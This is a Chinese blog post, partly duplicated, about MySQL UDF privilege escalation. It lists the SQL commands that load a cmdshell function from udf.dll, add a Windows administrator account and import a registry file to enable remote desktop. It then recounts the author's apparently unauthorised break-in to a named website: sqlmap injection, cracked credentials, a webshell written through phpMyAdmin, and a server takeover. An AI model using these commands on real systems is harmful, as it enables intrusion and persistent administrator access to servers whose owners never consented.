udf提权的一次学习
2015-03-17 00:28
344 查看
udf提权。利用条件:root权限的mysql账号密码。提权方法:具体语句如下:
create function cmdshell returns string soname ‘udf.dll’;
select cmdshell(’net user iis_user 123 /add’);
select cmdshell(’net localgroup administrators iis_user /add’);
select cmdshell(’regedit /s d:\web\3389.reg’);
drop function cmdshell;
select cmdshell(’netstat -an’);
要测试的站点:http://www.xiyutm.com/,至于怎么找到的呢?google大法好。
随便点进去一个url。。。都有注入点。。。
放到sqlmap里面跑
然后很幸运的跑到了后台的帐号和密码,还有数据库的帐号和密码,放到md5上面,解密需要money,,,放到习科里面,雷锋的菊苣们给了明文。。。。
然后呢?进入后台,找不到上传点。绝望了,,,然后和学长get了新技能,,,上了phpmyadmin,,,用数据库写一句话,,,很幸运,数据库的权限是root。。。
然后连接小马,,,开始udf提权。。。因为这个站点的条件很顺,,,所以直接上传了一个udf.php,,,连接数据库,net user呗,,,
然后服务器被搞定了。。。
看了一下,c盘只剩下几十kb了。。。。真牛。。。
后记:昨天晚上的时候,其实已经写完了,要比篇更加详细一些。但是当时写完的时候,正在和妹子聊qq,切换太快,尼玛,,,突然火狐浏览器一刷,,,没有了。。。加上这几天天气潮湿,感冒一直不好,,,就这样简单的记录一下吧。。。
create function cmdshell returns string soname ‘udf.dll’;
select cmdshell(’net user iis_user 123 /add’);
select cmdshell(’net localgroup administrators iis_user /add’);
select cmdshell(’regedit /s d:\web\3389.reg’);
drop function cmdshell;
select cmdshell(’netstat -an’);
要测试的站点:http://www.xiyutm.com/,至于怎么找到的呢?google大法好。
随便点进去一个url。。。都有注入点。。。
放到sqlmap里面跑
然后很幸运的跑到了后台的帐号和密码,还有数据库的帐号和密码,放到md5上面,解密需要money,,,放到习科里面,雷锋的菊苣们给了明文。。。。
然后呢?进入后台,找不到上传点。绝望了,,,然后和学长get了新技能,,,上了phpmyadmin,,,用数据库写一句话,,,很幸运,数据库的权限是root。。。
然后连接小马,,,开始udf提权。。。因为这个站点的条件很顺,,,所以直接上传了一个udf.php,,,连接数据库,net user呗,,,
然后服务器被搞定了。。。
看了一下,c盘只剩下几十kb了。。。。真牛。。。
后记:昨天晚上的时候,其实已经写完了,要比篇更加详细一些。但是当时写完的时候,正在和妹子聊qq,切换太快,尼玛,,,突然火狐浏览器一刷,,,没有了。。。加上这几天天气潮湿,感冒一直不好,,,就这样简单的记录一下吧。。。
相关文章推荐
- 记mysql下提权不成功的一次学习
- 一次艰难的提权 MYSQL中的UDF 的研究
- 学习在活动目录中一次同时添加多个用户帐户
- 一次笔试,一次学习
- UDF提权遇到Can't open shared library 'udf.dl'
- 关于udf提权
- mysql提权提示can't open shared library 'udf.dll'解决办法
- MYSQL简单提权--Mix.dll My_udf.dll(老东西,做个备份)
- 针对UML的一次很肤浅的学习
- 每天学习一算法系列(17)(在一个字符串中找到第一个只出现一次的字符)
- android面试题 不单单为了面试也是一次很好的学习
- 一次失败的学习后的思考
- 记一次艰难的sql提权。
- Yes!~ 我又写了一次树的建立及中序递归遍历。学习是一个不断重复的过程。温故而知新呀!~还是我自己调试出来的,找出错误的感觉真好!~
- 一次有意思的提权(G6FTP )
- 一次强烈的对比_差距(关于电话界面的学习)在此一并表示给出此代码的那位朋友的感谢
- JavaScript学习笔记2--表单只提交一次
- 项目管理-工作随笔(一次特殊项目的学习和思考)
- 一次不为兴趣的学习
- android面试题 不单单为了面试也是一次很好的学习